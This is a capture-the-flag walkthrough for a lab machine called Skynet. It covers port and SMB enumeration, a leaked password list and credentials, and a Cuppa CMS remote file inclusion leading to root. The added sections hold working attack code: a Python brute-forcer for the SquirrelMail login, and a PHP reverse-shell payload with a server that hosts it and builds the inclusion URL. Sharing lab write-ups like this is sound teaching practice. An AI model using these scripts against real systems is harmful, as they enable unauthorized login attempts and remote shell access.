Reconnaissance
As always, the first step is reconnaissance, starting with a port scan.
Port Scanning
During this step we identify the target and see which services are listening behind the IP address.
nmap -sC -sV -oA nmap -Pn 10.10.88.15
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKeTyrvAfbRB4onlz23fmgH5DPnSz07voOYaVMKPx5bT62zn7eZzecIVvfp5LBCetcOyiw2Yhocs0oO1/RZSqXlwTVzRNKzznG4WTPtkvD7ws/4tv2cAGy1lzRy9b+361HHIXT8GNteq2mU+boz3kdZiiZHIml4oSGhI+/+IuSMl5clB5/FzKJ+mfmu4MRS8iahHlTciFlCpmQvoQFTA5s2PyzDHM6XjDYH1N3Euhk4xz44Xpo1hUZnu+P975/GadIkhr/Y0N5Sev+Kgso241/v0GQ2lKrYz3RPgmNv93AIQ4t3i3P6qDnta/06bfYDSEEJXaON+A9SCpk2YSrj4A7
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0UWS0x1ZsOGo510tgfVbNVhdE5LkzA4SWDW/5UjDumVQ7zIyWdstNAm+lkpZ23Iz3t8joaLcfs8nYCpMGa/xk=
| 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICHVctcvlD2YZ4mLdmUlSwY8Ro0hCDMKGqZ2+DuI0KFQ
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 syn-ack ttl 63 Dovecot pop3d
|_pop3-capabilities: TOP UIDL SASL AUTH-RESP-CODE RESP-CODES PIPELINING CAPA
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap syn-ack ttl 63 Dovecot imapd
|_imap-capabilities: OK Pre-login more ID LITERAL+ IDLE have capabilities SASL-IR post-login listed LOGIN-REFERRALS LOGINDISABLEDA0001 ENABLE IMAP4rev1
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumerating Port 80
Browsing to http://10.10.88.15 on port 80 shows a search engine page.
Let's run gobuster to find hidden directories or files ($COMMON holds the path to the wordlist).
Gobuster
gobuster -w $COMMON -u http://10.10.88.15
Gobuster found two directories: /admin and /squirrelmail.
We don't have SquirrelMail credentials yet, so let's move on to SMB enumeration and come back later.
Enumerating SMB
We can do an initial scan of the SMB shares and users with Nmap's smb-enum scripts.
Nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.88.15
SMBClient
smbclient -L //10.10.88.15 -N
There are two shares, anonymous and milesdyson. Let's focus on the anonymous share for now and look for interesting files inside.
root@m4sterph0enix:/home/m4sterph0enix/Desktop/hackme/Skynet# smbclient //10.10.88.15/anonymous -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Sep 18 09:41:20 2019
.. D 0 Tue Sep 17 12:20:17 2019
attention.txt N 163 Wed Sep 18 08:04:59 2019
logs D 0 Wed Sep 18 09:42:16 2019
books D 0 Wed Sep 18 09:40:06 2019
9204224 blocks of size 1024. 5373516 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> dir
. D 0 Wed Sep 18 09:42:16 2019
.. D 0 Wed Sep 18 09:41:20 2019
log2.txt N 0 Wed Sep 18 09:42:13 2019
log1.txt N 471 Wed Sep 18 09:41:59 2019
log3.txt N 0 Wed Sep 18 09:42:16 2019
9204224 blocks of size 1024. 5373516 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (0.5 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \logs\>
We have downloaded two files, attention.txt and log1.txt; let's take a look at them.
attention.txt
A recent system malfunction has caused various passwords to be changed. All Skynet employees are required to change their password after seeing this.
-Miles Dyson
log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
attention.txt says that passwords were changed after a malfunction, and log1.txt reads like a list of candidate passwords (note that cyborg007haloterminator appears twice). The SquirrelMail credentials are probably in there, so let's brute-force the login with it.
BurpSuite
Start intercepting, capture the SquirrelMail login request and send it to Intruder to brute-force the login.
We have the password list from log1.txt but no username. attention.txt is signed by 'Miles Dyson', so let's try milesdyson as the username for now.
username: milesdyson
password: cyborg007haloterminator
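The same brute force as a script, as an added example that is not part of the original writeup: it de-duplicates log1.txt, posts each candidate to the SquirrelMail login handler and classifies the answer the way you would sort Intruder results by status code and length. The form field names, the redirect.php path and the "Unknown user or password incorrect" marker are assumptions based on SquirrelMail 1.4.x; confirm them against the captured request in Burp. The wordlist excerpt is constructed, and the fake sender stands in for the target so the script runs offline.

```python
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, List, Optional, Tuple

LOGIN_PATH = "/squirrelmail/src/redirect.php"      # SquirrelMail 1.4.x login handler (assumption: confirm in Burp)
FAIL_MARKER = "Unknown user or password incorrect"  # text on the 1.4.x failed-login page (assumption)

# Constructed excerpt of log1.txt; the real file has about 30 entries and one duplicate.
SAMPLE_LOG1 = "cyborg007haloterminator\nterminator22596\nterminator219\ncyborg007haloterminator\n"

Sender = Callable[[str, bytes], Tuple[int, Optional[str], str]]  # (status, Location header, body)


def load_wordlist(text: str) -> List[str]:
    """Ordered, de-duplicated candidate list: no point sending a password twice."""
    seen, out = set(), []
    for line in text.splitlines():
        pw = line.strip()
        if pw and pw not in seen:
            seen.add(pw)
            out.append(pw)
    return out


def build_login_request(base_url: str, username: str, password: str) -> Tuple[str, bytes]:
    """URL and POST body with the same field names the browser form submits."""
    body = urllib.parse.urlencode({
        "login_username": username,
        "secretkey": password,
        "js_autodetect_results": "1",
        "just_logged_in": "1",
    }).encode()
    return base_url.rstrip("/") + LOGIN_PATH, body


def classify_response(status: int, location: Optional[str], body: str) -> str:
    """'success' = redirect into the mailbox, 'fail' = the error page,
    'unknown' = anything else (lockout, wrong path, WAF) so the caller stops and looks."""
    if status in (301, 302, 303) and location and "webmail.php" in location:
        return "success"
    if status == 200 and FAIL_MARKER in body:
        return "fail"
    return "unknown"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep the 302 visible instead of following it into webmail.php."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_send(url: str, body: bytes) -> Tuple[int, Optional[str], str]:
    """Real transport. urllib raises HTTPError for a non-followed 302, so both paths return the same tuple."""
    req = urllib.request.Request(url, data=body, method="POST")
    try:
        with urllib.request.build_opener(_NoRedirect).open(req, timeout=10) as resp:
            return resp.status, resp.headers.get("Location"), resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location"), err.read().decode(errors="replace")


def brute_force(base_url: str, username: str, passwords: List[str], send: Sender = http_send) -> Optional[str]:
    """Try each password once; return the first one that logs in, None if none does."""
    for pw in passwords:
        url, body = build_login_request(base_url, username, pw)
        verdict = classify_response(*send(url, body))
        if verdict == "success":
            return pw
        if verdict == "unknown":
            raise RuntimeError(f"unexpected response for {pw!r}; inspect the request in Burp")
    return None


def fake_sender(correct_password: str) -> Sender:
    """Offline stand-in for the target: answers the way SquirrelMail 1.4.x would."""
    def send(url: str, body: bytes) -> Tuple[int, Optional[str], str]:
        fields = urllib.parse.parse_qs(body.decode())
        if fields.get("secretkey", [""])[0] == correct_password:
            return 302, "http://10.10.88.15/squirrelmail/src/webmail.php", ""
        return 200, None, "<html><body>Unknown user or password incorrect.</body></html>"
    return send


if __name__ == "__main__":
    # Offline run against the fake target; for the live box pass send=http_send and the real log1.txt.
    found = brute_force("http://10.10.88.15", "milesdyson", load_wordlist(SAMPLE_LOG1),
                        send=fake_sender("cyborg007haloterminator"))
    print("password:", found)
```

The 'unknown' verdict matters more than it looks: if the target starts answering with a lockout page or a different status, the loop stops instead of burning through the rest of the list and reporting nothing.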
Let's log in to SquirrelMail with those credentials.
We are greeted with three emails, and the one we are looking for is "Samba Password Reset":
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
That gives us SMB credentials for the 'milesdyson' share. Connecting to it as milesdyson with that password, there is a notes directory containing an important.txt file, which we download.
Let's take a look inside important.txt.
It references /45kra24zxs28v3yd, which looks like a hidden web directory, so let's check it.
Browsing to it returns a page; let's run directory enumeration against it.
Gobuster
gobuster -w $COMMON -u http://10.10.17.161/45kra24zxs28v3yd/ -t 50
There's an /administrator directory; let's check it out.
Cuppa CMS is installed there, so let's search for exploits.
Searchsploit
Searchsploit lists a Local/Remote File Inclusion exploit for Cuppa CMS.
Testing The Exploit
Let's host a PHP reverse-shell payload on our machine, include it through the RFI and catch the shell with a listener.
Exploitation
Remote File Inclusion
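The mechanics of that step, as an added example that is not from the original writeup or from Cuppa CMS: serve the PHP payload ourselves, build the inclusion URL, and record whether the target actually fetched the file. The vulnerable script name, the parameter name and the attacker addresses are placeholders (assumptions); take the real script and parameter from the searchsploit entry and use your VPN address.

```python
import http.server
import socketserver
import threading
import urllib.parse
import urllib.request
from typing import List, Tuple

# Placeholders (assumptions): the vulnerable script and parameter come from the
# searchsploit entry, not from this example; LHOST/LPORT are our VPN host and listener.
TARGET_BASE = "http://10.10.17.161/45kra24zxs28v3yd/administrator"
VULN_PATH = "/vulnerable.php"      # replace with the script named in the exploit
VULN_PARAM = "include_param"       # replace with the parameter named in the exploit
LHOST, LPORT = "10.8.0.2", 4444    # our VPN address and the port of `nc -lvnp 4444`


def php_reverse_shell(lhost: str, lport: int) -> str:
    """PHP payload: connect back and attach an interactive /bin/sh to the socket.
    It is served as .txt so our own web server never executes it; the target's include() will."""
    return (f"<?php $s = fsockopen('{lhost}', {lport}); "
            "proc_open('/bin/sh -i', array(0 => $s, 1 => $s, 2 => $s), $p); ?>")


def rfi_url(target_base: str, vuln_path: str, vuln_param: str, payload_url: str) -> str:
    """Inclusion URL. The payload URL is percent-encoded so its own ':' '/' '?' and '&'
    survive intact instead of being parsed as extra parameters by the target."""
    query = urllib.parse.urlencode({vuln_param: payload_url})
    return target_base.rstrip("/") + vuln_path + "?" + query


class PayloadServer:
    """Serves the payload at one path and records every fetch. A recorded hit proves
    the include fired on the target even when no shell comes back (for example when
    outbound connections to LPORT are filtered); no hit at all points at
    allow_url_include being Off or the target not reaching our host."""

    def __init__(self, path: str, body: bytes, host: str = "127.0.0.1", port: int = 0):
        self.hits: List[Tuple[str, str]] = []
        hits, served_path = self.hits, path

        class Handler(http.server.BaseHTTPRequestHandler):
            def do_GET(self):
                hits.append((self.client_address[0], self.path))
                if self.path != served_path:
                    self.send_error(404)
                    return
                self.send_response(200)
                self.send_header("Content-Type", "text/plain")
                self.send_header("Content-Length", str(len(body)))
                self.end_headers()
                self.wfile.write(body)

            def log_message(self, *args):  # keep the console quiet for the listener
                pass

        self.httpd = socketserver.TCPServer((host, port), Handler)
        self.port = self.httpd.server_address[1]   # real port when 0 was requested
        threading.Thread(target=self.httpd.serve_forever, daemon=True).start()

    def stop(self) -> None:
        self.httpd.shutdown()
        self.httpd.server_close()


def fetch(url: str) -> bytes:
    """Small client used to self-test the server (the target does this for real)."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.read()


if __name__ == "__main__":
    payload = php_reverse_shell(LHOST, LPORT).encode()
    server = PayloadServer("/shell.txt", payload, host="0.0.0.0", port=8000)
    # With `nc -lvnp 4444` running, open this URL in the browser or with curl:
    print(rfi_url(TARGET_BASE, VULN_PATH, VULN_PARAM, f"http://{LHOST}:8000/shell.txt"))
    input("waiting for the target to fetch the payload; press Enter to stop\n")
    print("hits:", server.hits)
    server.stop()
```

Two things to check before blaming the payload: PHP only includes http:// URLs when allow_url_include is On, and the target must be able to reach both the web server and the listener on our VPN address. If the server never logs a hit, fall back to the local-inclusion side of the same exploit.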
User.txt
The user flag is located at /home/milesdyson/user.txt.
Privilege Escalation
Now that we're in the machine, let's enumerate further to escalate privileges.
Method #1
The kernel, Linux 4.8.0-58, has a known local privilege escalation exploit.
Linux version 4.8.0-58-generic
Compile the exploit (on the target if it has a compiler, otherwise on a matching system) and run it; kernel exploits can crash the box, so be ready to reset it.
And we got root!